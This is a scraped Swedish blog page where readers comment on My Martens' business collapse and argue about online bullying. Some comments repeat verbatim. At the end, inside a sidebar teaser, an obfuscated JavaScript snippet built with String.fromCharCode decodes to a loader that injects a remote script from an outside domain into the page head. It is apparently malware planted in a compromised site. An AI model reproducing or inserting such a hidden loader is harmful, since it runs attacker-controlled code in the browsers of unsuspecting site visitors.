  • Förmodligen släpps ej denna kommentar igenom. Men. My har själv i ett tidigare inlägg bett läsare att inte skriva om andra vänner/bloggare. Ändå släpps det igenom. Det är där skon klämmer. Det blir mobbing mot andra människor som inte har något med My att göra. Det är inte rätt. Förstår du vad jag menar? / Eva

   • Där skon klämmer är där ALLA skyddar mobbaren!
    I detta fall blir det så då alla vill sopa problemet under mattan och vem vann då? Jo mobbaren den som förtalar påstår och får sin vilja igenom genom att ALLA hymlar med att alla skall vara vänner och tysta ner problemet.
    Häng ut dem som mobbar annars får den som är oskyldig ta skiten. Precis som i skolorna…Den stackaren som blir mobbad får snällt flytta på sig.
    Det är ERT fel att det finns folk som mobbar inte DE som vet vad som hänt i detta fall som ni så fint kallar nättroll. De största nättrollet är oftast den som känner sig hotad, så som i detta fall (någon som har något att förlora).
    TÄNK EFTER! TÄNK OM! Tänk utanför boxen, allt är inte som NI tror. VARFÖR finns då mobbningen kvar? Borde varit utrotat för länge sedan!

    • Skillnaden är att jag förstår att man inte kan påverka någon annan.Jag kan bara tala för mig själv, stå för det JAG säger och gör!
     Att hänga ut någon eller i detta fallet ganska många. Det vore ju att sänka sig till samma nivå! Det står inte jag för! Som jag skrev, det finns ingen tid, ork, eller energi att lägga på detta….. Mobbning hade inte utrotats genom att hänga ut någon/några det hade gjort allt mycket värre…. Helt onödigt enligt mig!

     • Ja då får vi väl snällt flytta på oss för mobbarna.. ert recept inte mitt. Utrotar man inte källan så får man leva vidare i skiten. Städar man inte skåpet får man leva i röran.
      Ingen kritik mot dig My.. önskar dig all lycka!
      Mitt råd, Låt det rinna av som vatten på en gås, finns alltid de som tycker annorlunda… det är inte hela världen faktiskt.
      MEN att driva företag är faktiskt som att föda ett barn som man närt och uppfostrat och det gör jävligt ont när någon skadar det, jo jag vet. Gå igenom alla stadierna med sorg (sorgeår)…chock, ledsamhet, ilska m.m inte förräns du gått igenom dessa stadier kan du ta dig upp igen. Streta inte emot… låt tiden läka alla sår.

    • Är du dum på riktigt? Det är en läsare som hänger ut en annan person när My själv har skrivit att hon inte vill ha sådana kommentarer. Det är inte mobbing mot My! Det är mobbing mot en person som inte har något med My att göra! Försöker ni uppvigla till någon sorts hämndaktion från personen i fråga? I My’s kommentarer skriver man till My. Inte något om någon annan. My vill ju inte det. Respektera hennes önskan istället / Eva

     • okej Eva du vinner… mobbarna i sitt nötskal..varsegod! Finns ingen hämd men jag vet vad mer och säga ? mobba ni på…

 31. Alla moment är ju urtunga att sköta o vara hyfsat trevlig o så! Klart det är urtungt o besvikelser att va i!Affären va ju som en sorts familj också och har man inte massa andra starka hem/hushåll så e de ensamt mitt i allting o se hus o odlingar kollapsa. Sorg ,besvikelser, oro,lessenhet till gränsen till apati, de e hemskt. Jag går på sechand i olika kyrkor, emmaus mm. Har hittat olika ställen för att med inga pengar hitta lite trivselsaker o ändå ge till de ändamål som de har.Inte klokt vad man kan hitta !! Lite terapi för själen att hitta momorskoppar, virkademormors filtar o skapa mysiga miljöer, fylla Kopparna med små blommor.

 32. Fasen det kan inte vara lätt, släpper du inte fram kommentarer så får du skit, släpper du fram de så får du skit… Det gnälls på My att hon inte släpper fram negativa kommentarer mot sig själv, utan bara skulle visa de som står och hejar på henne…
  Hade det varit sanningen så hade det aldrig blivit ngt kackel i kommentarerna, vilket det är mer ofta än sällan.

  Vad ger det dig som skriver saker du vet sårar en annan människa som står och balanserar på kanten? Blir du stolt som fan, slår dig för bröstet och skriver i ditt CV, ”det var jag som satte nådastöten i My Martens, nu lär hon inte komma upp över ytan på ett bra tag”.

  Det pratas en massa om mobbning i skolor och på sociala medier bla, varför kan inte vi som är vuxna försöka stötta varandra istället för att såra, håna eller bara vara elaka?
  Man måste inte älska alla, men man kan iaf visa respekt! Man behöver inte alltid hålla med, livet hade varit jäkligt trist om alla var ja-sägare och inte hade en egen åsikt, men man måste inte vara elak för att poängtera att man tycker att ngt dessa bloggerskor skriver är ”fel”. Gillar man inte vad någon skriver, eller stör sig på personen, så sluta läs, det är inte svårare än så.

  Kom igen nu tjejer/mammor, vi kan väl börja stötta varandra istället för att trycka ner och hugga varandra i ryggen? Känns som om man har så mkt annat att kriga om som kvinna.

  • Förmodligen släpps ej denna kommentar igenom. Men. My har själv i ett tidigare inlägg bett läsare att inte skriva om andra vänner/bloggare. Ändå släpps det igenom. Det är där skon klämmer. Det blir mobbing mot andra människor som inte har något med My att göra. Det är inte rätt. Förstår du vad jag menar? / Eva

   • Där skon klämmer är där ALLA skyddar mobbaren!
    I detta fall blir det så då alla vill sopa problemet under mattan och vem vann då? Jo mobbaren den som förtalar påstår och får sin vilja igenom genom att ALLA hymlar med att alla skall vara vänner och tysta ner problemet.

    Häng ut dem som mobbar annars får den som är oskyldig ta skiten. Precis som i skolorna…Den stackaren som blir mobbad får snällt flytta på sig.

    Det är ERT fel att det finns folk som mobbar inte DE som vet vad som hänt i detta fall som ni så fint kallar nättroll. De största nättrollet är oftast den som känner sig hotad, så som i detta fall (någon som har något att förlora).

    TÄNK EFTER! TÄNK OM! Tänk utanför boxen, allt är inte som NI tror. VARFÖR finns då mobbningen kvar? Borde varit utrotat för länge sedan!

    • Skillnaden är att jag förstår att man inte kan påverka någon annan.Jag kan bara tala för mig själv, stå för det JAG säger och gör!

     Att hänga ut någon eller i detta fallet ganska många. Det vore ju att sänka sig till samma nivå! Det står inte jag för! Som jag skrev, det finns ingen tid, ork, eller energi att lägga på detta….. Mobbning hade inte utrotats genom att hänga ut någon/några det hade gjort allt mycket värre…. Helt onödigt enligt mig!

     • Ja då får vi väl snällt flytta på oss för mobbarna.. ert recept inte mitt. Utrotar man inte källan så får man leva vidare i skiten. Städar man inte skåpet får man leva i röran.

      Ingen kritik mot dig My.. önskar dig all lycka!

      Mitt råd, Låt det rinna av som vatten på en gås, finns alltid de som tycker annorlunda… det är inte hela världen faktiskt.

      MEN att driva företag är faktiskt som att föda ett barn som man närt och uppfostrat och det gör jävligt ont när någon skadar det, jo jag vet. Gå igenom alla stadierna med sorg (sorgeår)…chock, ledsamhet, ilska m.m inte förräns du gått igenom dessa stadier kan du ta dig upp igen. Streta inte emot… låt tiden läka alla sår.

    • Är du dum på riktigt? Det är en läsare som hänger ut en annan person när My själv har skrivit att hon inte vill ha sådana kommentarer. Det är inte mobbing mot My! Det är mobbing mot en person som inte har något med My att göra! Försöker ni uppvigla till någon sorts hämndaktion från personen i fråga? I My’s kommentarer skriver man till My. Inte något om någon annan. My vill ju inte det. Respektera hennes önskan istället / Eva

     • okej Eva du vinner… mobbarna i sitt nötskal..varsegod! Finns ingen hämd men jag vet vad mer och säga ? mobba ni på…

 33. Bra skrivet Lena! Det är inte konstigt att det finns så mycket mobbning i skolorna med tanke på hur vuxna människor beter sig i kommentarsfälten. Jag tror att ganska många som kommenterar elakt på bloggar faktiskt har egna barn och då undrar man ju vilka signaler ni sänder ut i hemmen? Är det ok att bete sig illa hemma hos er eller kan ni inte längre skilja på vad som är dåligt beteende? Håller alla på att bli avtrubbade??? Kämpa på My, du fixar det här och det blir bättre! Kram!

 34. Jag tror att du en dag kommer att känna att du är ”igenom”. Pressa dig inte att tänka HUR du ska göra… Det kommer… Men på sätt och vis är det som du redan vet vad det är som gör att du kommer framåt… Din son, lilleman… <3 Jag KÄNNER kärleken till honom genom allt du skriver… Kram!

 35. Jag kan inte låta bli att tycka synd om dig. Du har ett helvitti just nu, stackars tjej, och du är inte gammal. Ljuset finns i mörkret, och låt oss säga att du har genomlevt i dina unga år mer än vad en *kärring* <3 i 50-årsåldern generellt sett hunnit med. Jag är mycket äldre än dig, men jag älskar när unga eller gamla människor har ett genuint driv i sig. Du har verkligen det i dig. Kom ihåg vilka som är dina vänner i motgång, resten ska du skita i även när vindarna vänder. Många har ett omättligt bekräftelsebehov, det tar aldrig slut. Håll i din energi just nu, håll hårt i den… Ta hjälp utifrån att sortera dina tankar.. ovärderligt när man är inne i torktumlaren. Du har en del att reda ut, men det löser sig, det kommer det att göra. Ha tillit, till att det som sker ska ske.. svårt kanske att ta in men så är det bara. Jag kunde inte låta bli att skriva och skickar massor av ljus till dig med kärlek. Ljuset är starkare än mörkret , och i den tron måste vi hämta kraft.

 36. Bra skrivet Lena! Det är inte konstigt att det finns så mycket mobbning i skolorna med tanke på hur vuxna människor beter sig i kommentarsfälten. Jag tror att ganska många som kommenterar elakt på bloggar faktiskt har egna barn och då undrar man ju vilka signaler ni sänder ut i hemmen? Är det ok att bete sig illa hemma hos er eller kan ni inte längre skilja på vad som är dåligt beteende? Håller alla på att bli avtrubbade??? Kämpa på My, du fixar det här och det blir bättre! Kram!

 37. Jag tror att du en dag kommer att känna att du är ”igenom”. Pressa dig inte att tänka HUR du ska göra… Det kommer… Men på sätt och vis är det som du redan vet vad det är som gör att du kommer framåt… Din son, lilleman… <3 Jag KÄNNER kärleken till honom genom allt du skriver… Kram!

 38. Jag kan inte låta bli att tycka synd om dig. Du har ett helvitti just nu, stackars tjej, och du är inte gammal. Ljuset finns i mörkret, och låt oss säga att du har genomlevt i dina unga år mer än vad en *kärring* <3 i 50-årsåldern generellt sett hunnit med. Jag är mycket äldre än dig, men jag älskar när unga eller gamla människor har ett genuint driv i sig. Du har verkligen det i dig. Kom ihåg vilka som är dina vänner i motgång, resten ska du skita i även när vindarna vänder. Många har ett omättligt bekräftelsebehov, det tar aldrig slut. Håll i din energi just nu, håll hårt i den… Ta hjälp utifrån att sortera dina tankar.. ovärderligt när man är inne i torktumlaren. Du har en del att reda ut, men det löser sig, det kommer det att göra. Ha tillit, till att det som sker ska ske.. svårt kanske att ta in men så är det bara. Jag kunde inte låta bli att skriva och skickar massor av ljus till dig med kärlek. Ljuset är starkare än mörkret , och i den tron måste vi hämta kraft.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/